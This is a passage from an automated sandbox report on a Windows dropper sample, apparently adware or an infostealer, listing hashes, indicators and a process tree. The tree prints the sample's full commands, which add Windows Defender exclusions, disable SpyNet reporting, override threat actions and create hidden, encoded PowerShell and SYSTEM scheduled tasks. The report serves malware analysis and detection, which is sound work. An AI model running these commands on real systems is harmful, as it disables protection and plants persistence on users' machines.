Analysis
-
max time kernel
152s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
28/10/2022, 21:54
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220812-en
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
2b45411ed9ea8e68c029cc0438d58d58
-
SHA1
9a296a005849ea8619ddb1478ad597a3fcdc348f
-
SHA256
cf8b5aa132d63783d62e93b9152ae9001f830034acddfc5ef905e5584cdcc2c9
-
SHA512
22fb58a80014173194bf235ca518095fc6919343bc67afd81fb62867fa776d8ab248e135ba75756831449a5fe4c666ebbce23d45f2087ef7782e368a02db0f95
-
SSDEEP
196608:91OmV9gYAf7ATQA8Jm+uN6lRZJM6+y8gYTwJkI3YWiyg:3OiBi7AM9JmEWy8gNGI3Yh
Malware Config
Signatures
-
Executes dropped EXE 4 IoCs
pid Process 1524 Install.exe 2284 Install.exe 1724 UbohqCi.exe 3372 STYRYMW.exe -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation STYRYMW.exe -
Loads dropped DLL 1 IoCs
pid Process 4684 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json STYRYMW.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\meejmcfbiapijdfaadackoblffmidlig\1.0.0.0\manifest.json STYRYMW.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini STYRYMW.exe -
Drops file in System32 directory 31 IoCs
description ioc Process File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 STYRYMW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA STYRYMW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_7987E17ED77D800093D5BF3096E78D98 STYRYMW.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini UbohqCi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 STYRYMW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content STYRYMW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE STYRYMW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 STYRYMW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3B8C7C973B30115D9F846695C38BBC1F STYRYMW.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_A49E2928C282F3D7B74BA1083F81B152 STYRYMW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_A49E2928C282F3D7B74BA1083F81B152 STYRYMW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_7D7374C3BD488A38BC34DD9B008EDC62 STYRYMW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_7D7374C3BD488A38BC34DD9B008EDC62 STYRYMW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies STYRYMW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft STYRYMW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 STYRYMW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA STYRYMW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_7987E17ED77D800093D5BF3096E78D98 STYRYMW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 STYRYMW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 STYRYMW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA STYRYMW.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol STYRYMW.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol UbohqCi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3B8C7C973B30115D9F846695C38BBC1F STYRYMW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache STYRYMW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData STYRYMW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA STYRYMW.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak STYRYMW.exe File created C:\Program Files (x86)\FtCSCKapluTyC\gAjrGox.dll STYRYMW.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak STYRYMW.exe File created C:\Program Files (x86)\oZLmQfqCTfSU2\pmwcfIR.xml STYRYMW.exe File created C:\Program Files (x86)\CObbbsGJtWXfjQwTNWR\AivdEls.xml STYRYMW.exe File created C:\Program Files (x86)\eTQrVVcbPeUn\CTRvaYR.dll STYRYMW.exe File created C:\Program Files (x86)\ptIyuvGcU\UDoUZr.dll STYRYMW.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi STYRYMW.exe File created C:\Program Files (x86)\ptIyuvGcU\evRMuqs.xml STYRYMW.exe File created C:\Program Files (x86)\CObbbsGJtWXfjQwTNWR\CbpRQXx.dll STYRYMW.exe File created C:\Program Files (x86)\FtCSCKapluTyC\OVcSajc.xml STYRYMW.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi STYRYMW.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja STYRYMW.exe File created C:\Program Files (x86)\oZLmQfqCTfSU2\uUYDFoJUpZuri.dll STYRYMW.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bhLXEjHxBtkbbNqWSu.job schtasks.exe File created C:\Windows\Tasks\PiYQFbjPeBiHsXAGG.job schtasks.exe File created C:\Windows\Tasks\IUuCIySJJwGxjXb.job schtasks.exe File created C:\Windows\Tasks\mNPFWxOQLftKPxeaH.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4896 schtasks.exe 3764 schtasks.exe 1424 schtasks.exe 1096 schtasks.exe 3152 schtasks.exe 4832 schtasks.exe 4460 schtasks.exe 5076 schtasks.exe 4676 schtasks.exe 4772 schtasks.exe 4904 schtasks.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix STYRYMW.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{5d2b4a7c-0000-0000-0000-d01200000000}\MaxCapacity = "15140" STYRYMW.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" STYRYMW.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{5d2b4a7c-0000-0000-0000-d01200000000} STYRYMW.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" STYRYMW.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "5" STYRYMW.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" STYRYMW.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" STYRYMW.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume STYRYMW.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ STYRYMW.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer STYRYMW.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{5d2b4a7c-0000-0000-0000-d01200000000}\NukeOnDelete = "0" STYRYMW.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket STYRYMW.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe -
Suspicious behavior: EnumeratesProcesses 40 IoCs
pid Process 4700 powershell.EXE 4700 powershell.EXE 2768 powershell.exe 2768 powershell.exe 3784 powershell.exe 3784 powershell.exe 4236 powershell.EXE 4236 powershell.EXE 3372 STYRYMW.exe 3372 STYRYMW.exe 3372 STYRYMW.exe 3372 STYRYMW.exe 3372 STYRYMW.exe 3372 STYRYMW.exe 3372 STYRYMW.exe 3372 STYRYMW.exe 3372 STYRYMW.exe 3372 STYRYMW.exe 3372 STYRYMW.exe 3372 STYRYMW.exe 3372 STYRYMW.exe 3372 STYRYMW.exe 3372 STYRYMW.exe 3372 STYRYMW.exe 3372 STYRYMW.exe 3372 STYRYMW.exe 3372 STYRYMW.exe 3372 STYRYMW.exe 3372 STYRYMW.exe 3372 STYRYMW.exe 3372 STYRYMW.exe 3372 STYRYMW.exe 3372 STYRYMW.exe 3372 STYRYMW.exe 3372 STYRYMW.exe 3372 STYRYMW.exe 3372 STYRYMW.exe 3372 STYRYMW.exe 3372 STYRYMW.exe 3372 STYRYMW.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 4700 powershell.EXE Token: SeDebugPrivilege 2768 powershell.exe Token: SeDebugPrivilege 3784 powershell.exe Token: SeDebugPrivilege 4236 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4636 wrote to memory of 1524 4636 file.exe 82 PID 4636 wrote to memory of 1524 4636 file.exe 82 PID 4636 wrote to memory of 1524 4636 file.exe 82 PID 1524 wrote to memory of 2284 1524 Install.exe 83 PID 1524 wrote to memory of 2284 1524 Install.exe 83 PID 1524 wrote to memory of 2284 1524 Install.exe 83 PID 2284 wrote to memory of 3916 2284 Install.exe 88 PID 2284 wrote to memory of 3916 2284 Install.exe 88 PID 2284 wrote to memory of 3916 2284 Install.exe 88 PID 2284 wrote to memory of 5064 2284 Install.exe 90 PID 2284 wrote to memory of 5064 2284 Install.exe 90 PID 2284 wrote to memory of 5064 2284 Install.exe 90 PID 3916 wrote to memory of 4976 3916 forfiles.exe 92 PID 3916 wrote to memory of 4976 3916 forfiles.exe 92 PID 3916 wrote to memory of 4976 3916 forfiles.exe 92 PID 5064 wrote to memory of 1764 5064 forfiles.exe 93 PID 5064 wrote to memory of 1764 5064 forfiles.exe 93 PID 5064 wrote to memory of 1764 5064 forfiles.exe 93 PID 4976 wrote to memory of 1016 4976 cmd.exe 95 PID 4976 wrote to memory of 1016 4976 cmd.exe 95 PID 4976 wrote to memory of 1016 4976 cmd.exe 95 PID 1764 wrote to memory of 2868 1764 cmd.exe 94 PID 1764 wrote to memory of 2868 1764 cmd.exe 94 PID 1764 wrote to memory of 2868 1764 cmd.exe 94 PID 1764 wrote to memory of 1692 1764 cmd.exe 97 PID 1764 wrote to memory of 1692 1764 cmd.exe 97 PID 1764 wrote to memory of 1692 1764 cmd.exe 97 PID 4976 wrote to memory of 2532 4976 cmd.exe 96 PID 4976 wrote to memory of 2532 4976 cmd.exe 96 PID 4976 wrote to memory of 2532 4976 cmd.exe 96 PID 2284 wrote to memory of 4460 2284 Install.exe 99 PID 2284 wrote to memory of 4460 2284 Install.exe 99 PID 2284 wrote to memory of 4460 2284 Install.exe 99 PID 2284 wrote to memory of 3644 2284 Install.exe 101 PID 2284 wrote to memory of 3644 2284 Install.exe 101 PID 2284 wrote to memory of 3644 2284 Install.exe 101 PID 4700 wrote to memory of 4784 4700 powershell.EXE 105 PID 4700 wrote to memory of 4784 4700 powershell.EXE 105 PID 2284 wrote to memory of 1684 2284 Install.exe 113 PID 2284 wrote to memory of 1684 2284 Install.exe 113 PID 2284 wrote to memory of 1684 2284 Install.exe 113 PID 2284 wrote to memory of 5076 2284 Install.exe 115 PID 2284 wrote to memory of 5076 2284 Install.exe 115 PID 2284 wrote to memory of 5076 2284 Install.exe 115 PID 1724 wrote to memory of 2768 1724 UbohqCi.exe 118 PID 1724 wrote to memory of 2768 1724 UbohqCi.exe 118 PID 1724 wrote to memory of 2768 1724 UbohqCi.exe 118 PID 2768 wrote to memory of 2044 2768 powershell.exe 120 PID 2768 wrote to memory of 2044 2768 powershell.exe 120 PID 2768 wrote to memory of 2044 2768 powershell.exe 120 PID 2044 wrote to memory of 1872 2044 cmd.exe 121 PID 2044 wrote to memory of 1872 2044 cmd.exe 121 PID 2044 wrote to memory of 1872 2044 cmd.exe 121 PID 2768 wrote to memory of 1480 2768 powershell.exe 122 PID 2768 wrote to memory of 1480 2768 powershell.exe 122 PID 2768 wrote to memory of 1480 2768 powershell.exe 122 PID 2768 wrote to memory of 1672 2768 powershell.exe 123 PID 2768 wrote to memory of 1672 2768 powershell.exe 123 PID 2768 wrote to memory of 1672 2768 powershell.exe 123 PID 2768 wrote to memory of 2240 2768 powershell.exe 124 PID 2768 wrote to memory of 2240 2768 powershell.exe 124 PID 2768 wrote to memory of 2240 2768 powershell.exe 124 PID 2768 wrote to memory of 3828 2768 powershell.exe 125 PID 2768 wrote to memory of 3828 2768 powershell.exe 125
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4636 -
C:\Users\Admin\AppData\Local\Temp\7zSF6B9.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1524 -
C:\Users\Admin\AppData\Local\Temp\7zSED5.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2284 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:3916 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:4976 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:1016
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:2532
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:5064 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1764 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:2868
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:1692
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gfTdgyuvN" /SC once /ST 15:56:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:4460
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gfTdgyuvN"4⤵PID:3644
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gfTdgyuvN"4⤵PID:1684
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bhLXEjHxBtkbbNqWSu" /SC once /ST 23:56:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\cfpwpxOoZYMtrMqIi\nJmfrpIUXxqiPDe\UbohqCi.exe\" Ez /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:5076
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4700 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4784
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:2192
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:444
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:484
-
C:\Users\Admin\AppData\Local\Temp\cfpwpxOoZYMtrMqIi\nJmfrpIUXxqiPDe\UbohqCi.exeC:\Users\Admin\AppData\Local\Temp\cfpwpxOoZYMtrMqIi\nJmfrpIUXxqiPDe\UbohqCi.exe Ez /site_id 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:1724 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows 